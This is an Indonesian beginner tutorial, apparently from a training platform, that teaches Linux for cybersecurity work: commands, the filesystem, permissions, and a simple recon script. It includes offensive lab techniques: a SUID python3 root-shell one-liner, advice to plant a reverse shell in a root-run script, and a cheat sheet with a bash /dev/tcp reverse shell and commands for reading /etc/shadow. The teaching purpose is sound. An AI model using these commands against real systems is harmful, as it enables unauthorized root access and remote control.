Lu mau belajar cybersecurity tapi belum bisa Linux? Itu kayak mau jadi chef tapi ga bisa pegang pisau. Bukan ga mungkin — tapi lu bakal struggle di setiap langkah.
90% server di dunia jalan di Linux. 90% tools hacking dibuat buat Linux. Kali Linux, Parrot OS, semua distro security itu Linux-based. Mau jadi pentester, SOC analyst, atau security engineer — lu HARUS nyaman di terminal Linux. Ga ada jalan pintas.
Tapi kabar baiknya: Linux itu ga sesulit yang orang pikirin. Artikel ini bakal guide lu dari nol — dari yang ga pernah buka terminal sampe bisa navigasi, baca file, manage permission, dan bikin script sederhana.
Kenapa Linux, Bukan Windows?
Pertanyaan fair. Lu udah nyaman di Windows, kenapa harus pindah?
Server dunia pake Linux. AWS, Google Cloud, Azure — mayoritas server-nya jalan di Linux (Ubuntu, CentOS, Debian). Kalo lu mau pentest server, lu harus ngerti OS yang jalan di server itu.
Tools cybersecurity dibuat buat Linux. Nmap, Metasploit, Burp Suite, SQLMap, Hydra, John the Ripper, Wireshark — semuanya jalan native di Linux. Di Windows bisa, tapi sering ada compatibility issues.
Target lu jalan di Linux. Banyak challenge CTF dan lab pentest target-nya Linux machine. Kalo lu ga ngerti Linux, lu ga bisa navigate filesystem, baca config, atau escalate privilege di target.
Automation dan scripting. Bash scripting di Linux itu powerful banget buat automasi task. Bikin script buat scan, parsing log, atau automate exploit — semua lebih natural di Linux.
Buka Terminal Pertama Kali
Kalo lu pake Kali Linux, Parrot OS, atau Ubuntu — buka Terminal (Ctrl+Alt+T). Lu bakal liat sesuatu kayak gini:
┌──(kali㉿kali)-[~]
└─$ _Itu command prompt — tempat lu ngetik perintah. ~ artinya lu lagi di home directory. $ artinya lu login sebagai user biasa. Kalo berubah jadi #, lu jadi root (admin).
Jangan takut. Terminal itu cuma “text version” dari File Explorer. Semua yang bisa lu lakuin di GUI, bisa dilakuin di terminal — dan biasanya lebih cepet.
Command Dasar yang WAJIB Lu Hapal
Ini 15 command yang bakal lu pake setiap hari. Ga perlu hapal sekaligus — praktekin satu-satu.
Navigasi
pwd --> liat lu lagi di mana (print working directory)
ls --> list isi folder
ls -la --> list lengkap (termasuk hidden files + permissions)
cd /etc --> pindah ke folder /etc
cd .. --> mundur 1 folder
cd ~ --> balik ke home directoryBaca dan Manipulasi File
cat file.txt --> tampilin isi file
head -20 file.txt --> tampilin 20 baris pertama
tail -20 file.txt --> tampilin 20 baris terakhir
grep "password" file --> cari kata "password" di dalam file
nano file.txt --> edit file pake text editor nano
cp file.txt backup.txt --> copy file
mv file.txt /tmp/ --> pindah file ke /tmp/
rm file.txt --> hapus file (HATI-HATI, ga ada recycle bin)Sistem
whoami --> lu login sebagai siapa
id --> user ID, group ID, groups
uname -a --> info OS dan kernel
ps aux --> list semua proses yang jalan
sudo [command] --> jalanin command sebagai rootItu 15 command. Udah cukup buat navigasi 90% situasi di lab cybersecurity.
File System Linux: Beda dari Windows
Di Windows, lu kenal C:, D:, Program Files, Users. Di Linux, strukturnya beda total:
LINUX FILE SYSTEM
==================
/ --> root directory (bukan user root ya)
├── /home --> home folder semua user (/home/kali, /home/admin)
├── /root --> home folder khusus user root
├── /etc --> file konfigurasi sistem
│ ├── /etc/passwd --> daftar semua user
│ ├── /etc/shadow --> password hash semua user (perlu root)
│ └── /etc/hosts --> DNS lokal
├── /var --> variable data
│ └── /var/log --> LOG FILES (penting buat forensics)
├── /tmp --> temporary files (semua user bisa tulis)
├── /opt --> software tambahan
├── /bin --> binary/command dasar (ls, cat, grep)
├── /sbin --> system binary (butuh root)
└── /proc --> info proses yang lagi jalanYang paling penting buat cybersecurity:
/etc/passwddan/etc/shadow— target utama buat privilege escalation. Kalo lu bisa baca shadow, lu bisa crack password semua user./var/log/— semua log ada di sini. Auth log, syslog, apache log. Penting buat forensics dan SOC./tmp/— sering dipake buat upload payload karena semua user punya write access./home/— home directory user, sering ada file sensitif (SSH keys, credentials, notes).
Permission: Siapa Boleh Ngapain
Ini konsep yang bikin banyak pemula bingung tapi sebenernya simpel. Setiap file di Linux punya permission:
PERMISSION BREAKDOWN
=====================
ls -la output:
-rwxr-xr-- 1 admin staff 4096 Mar 27 10:00 script.sh
-rwxr-xr--
│└┬┘└┬┘└┬┘
│ │ │ └── Other: r-- (read only)
│ │ └────── Group: r-x (read + execute)
│ └────────── Owner: rwx (read + write + execute)
└──────────── File type: - (regular file)
r = read (baca)
w = write (tulis/edit)
x = execute (jalanin)
- = ga punya permission ituKenapa ini penting buat cybersecurity?
- Privilege Escalation — lu nyari file yang permission-nya salah. Misalnya script yang jalan sebagai root tapi bisa diedit semua user. Lu edit script-nya, masukin reverse shell, tunggu script dijalanin — boom, lu jadi root.
- SUID bit — file yang punya SUID bit jalan dengan permission owner-nya, bukan yang ngejalanin. Kalo owner-nya root dan lu nemuin SUID binary yang vulnerable, lu bisa escalate ke root.
Cari file SUID:
root@linuxenic:~$ find / -perm -4000 2>/dev/null
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/python3 <-- ini seharusnya ga ada SUID. VULNERABLE!Nemuin Python3 punya SUID? Satu command buat jadi root:
/usr/bin/python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
root@linuxenic:~# whoami
rootItu contoh real privilege escalation yang lu bakal ketemu di lab LINUXENIC.
Bash Scripting: Automasi Buat Hacker
Lu ga perlu jadi programmer buat bikin bash script. Ini cuma soal ngombin command-command yang udah lu tau jadi satu file yang bisa dijalanin otomatis.
Contoh: scan semua port di target, terus save hasilnya ke file.
#!/bin/bash
# Quick recon script
TARGET=$1
echo "[*] Scanning $TARGET..."
echo "[*] Running Nmap..."
nmap -sV -sC $TARGET -oN nmap_$TARGET.txt
echo "[*] Running Gobuster..."
gobuster dir -u http://$TARGET -w /usr/share/wordlists/dirb/common.txt -o gobuster_$TARGET.txt
echo "[*] Done! Results saved."Cara pake:
chmod +x recon.sh
./recon.sh target.lnxSatu command, dua tools jalan otomatis, hasil tersave. Itu power-nya scripting.
Distro Linux Buat Cybersecurity
| Distro | Buat Siapa | Keterangan |
|---|---|---|
| Kali Linux | Pentester | Pre-installed 600+ tools hacking. Paling populer. |
| Parrot OS | Pentester + Privacy | Mirip Kali, lebih ringan, ada mode privacy. |
| Ubuntu | General use | Paling gampang buat pemula. Bisa install tools manual. |
| Ubuntu Server | SOC / Sysadmin | Tanpa GUI, buat server dan lab environment. |
Buat pemula, mulai pake Ubuntu buat belajar dasar Linux. Setelah nyaman, pindah ke Kali Linux buat cybersecurity. Di LINUXENIC, lu ga perlu install apapun — HackerBox udah pake Kali yang bisa lu akses dari browser.
Cheat Sheet: Command Cybersecurity
| Tujuan | Command |
|---|---|
| Liat user sekarang | whoami |
| Liat semua user | cat /etc/passwd |
| Liat password hash | cat /etc/shadow (perlu root) |
| Cari file SUID | find / -perm -4000 2>/dev/null |
| Cari file writable | find / -writable 2>/dev/null |
| Liat cron jobs | crontab -l dan cat /etc/crontab |
| Liat network connections | netstat -tulnp atau ss -tulnp |
| Liat running processes | ps aux |
| Download file dari internet | wget http://url atau curl -O http://url |
| Transfer file ke target | python3 -m http.server 8080 |
| Bikin reverse shell | bash -i >& /dev/tcp/IP/PORT 0>&1 |
Belajar Linux Hands-On
Teori udah lu dapet. Sekarang buka terminal dan praktek. Di LINUXENIC ada materi khusus Linux dari nol:
- IT Support — Linux Fundamentals Part 1, 2, 3. Dari navigasi dasar sampe bash scripting.
- Cyber Security 101 — Linux Shells, command line advanced, scripting buat security.
- SOC Level 1 — Linux Forensics — analisis log, timeline, artifact di Linux.
- Security Engineer — Linux System Hardening — amanin server Linux dari serangan.
Semua langsung praktek di HackerBox — terminal Linux beneran yang bisa lu akses dari browser. Cek roadmap buat liat jalur lengkap.
FAQ
“Harus install Linux di laptop?” — Ga harus. Buat belajar, lu bisa pake virtual machine (VirtualBox/VMware), Windows Subsystem for Linux (WSL), atau langsung di HackerBox LINUXENIC dari browser. Nanti kalo udah serius, baru consider dual-boot.
“Kali Linux buat pemula cocok ga?” — Sebenernya Kali itu buat yang udah familiar sama Linux. Buat pemula total, belajar Ubuntu dulu 1-2 minggu baru pindah Kali. Tapi kalo lu langsung belajar di lab, ga masalah langsung Kali karena environment-nya udah disiapin.
“Harus hapal semua command?” — Engga. Yang penting lu tau command exist dan bisa cari referensi cepet. Lama-lama hapal sendiri dari sering pake. Ga ada pentester yang hapal semua flag Nmap — tapi semua tau cara buka nmap --help.
“Linux susah ga?” — Minggu pertama emang awkward. Lu biasa klik, sekarang harus ketik. Tapi setelah 2-3 minggu konsisten, lu bakal ngerasa terminal itu lebih cepet dan powerful dari GUI. Trust the process.

